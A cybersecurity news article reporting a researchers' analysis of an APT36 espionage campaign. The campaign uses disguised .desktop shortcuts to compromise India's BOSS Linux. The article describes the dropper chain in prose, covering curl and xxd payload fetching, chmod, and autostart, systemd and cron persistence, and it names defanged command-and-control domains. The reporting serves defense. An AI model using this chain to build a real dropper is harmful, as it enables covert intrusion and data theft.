According to researchers at CYFIRMA, this campaign, first observed in early August 2025, demonstrates a significant escalation in the group’s sophistication.
Traditionally reliant on Windows-based payloads and phishing documents, APT36 is now actively weaponizing BOSS-specific attack chains, a worrying development given the system’s widespread use across Indian government entities.
The attack commences through spear-phishing emails that deliver a compressed archive, concealing a malicious .desktop file disguised as an official government notice.
When opened, the file executes stealthy command sequences that initiate the download and execution of a hidden binary, while simultaneously presenting the victim with a harmless PDF decoy to maintain the illusion of legitimacy.
The centerpiece of the campaign is the .desktop file, crafted to resemble a legitimate PDF shortcut but laced with commands in its Exec field.
Once launched, it leverages utilities such as curl and xxd to fetch a hex-encoded payload from the attacker infrastructure, decode it into binary form, and store it under /tmp, and activate it in the background with execution rights silently granted via chmod.
This mechanism ensures the malware runs covertly, without presenting any visible terminal window. To secure persistence, the attackers exploit autostart entries that re-trigger the payload each time the user logs in.
Static analysis of the retrieved ELF executable reveals a Go-based binary with obfuscated headers and missing section names, traits commonly associated with packed or tampered malware.
More alarmingly, dynamic examination uncovered its reliance on systemd services and cron jobs for long-term persistence, in parallel with communication to a command-and-control node hosted at “modgovindia[.]space” on port 4000.
Additional infrastructure, including the newly registered domain “securestore[.]cv”, has been identified as part of the delivery chain, reinforcing the assessment of a coordinated state-backed operation.
This latest campaign underscores a deliberate and evolving strategy by APT36 to infiltrate India’s technological backbone.
By expanding its toolkit to compromise BOSS Linux specifically, the group is aiming to undermine trust in homegrown operating systems deployed across defense, diplomatic, and critical administrative structures.
Researchers warn that the ability to run cross-platform espionage operations magnifies the potential for sustained access and data theft.
For Indian institutions, the implications are severe, as reliance on spear-phishing combined with Linux-specific persistence allows attackers to bypass traditional security controls that remain heavily tuned toward Windows environments.
CYFIRMA’s findings highlight the pressing need to revise defense-in-depth models, incorporating Linux-capable endpoint detection, stricter execution controls over untrusted shortcut files, and proactive blocking of known malicious domains.
APT36’s consistent focus on India reflects broader geopolitical motives, with each new iteration of its tactics reinforcing the necessity of a vigilant and adaptive security posture.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Indian BOSS Linux Under Siege – APT36 Exploits Malicious .desktop Shortcuts appeared first on Cyber Security News.
Star Wars projects are at an all-time high, with The Mandalorian and Grogu set to…
A new weekend has arrived, and today, you can save big on Castlevania: The Complete…
Mojang Studios has officially announced that Minecraft Dungeons 2 is in development with plans to…
Mojang Studios has unveiled more information about updates coming to Minecraft in 2026, including the…
Minecraft World, a theme park based on the video game from Mojang Studios, will officially…
Concord police arrested a man they say was exposing himself in a private apartment complex.…
This website uses cookies.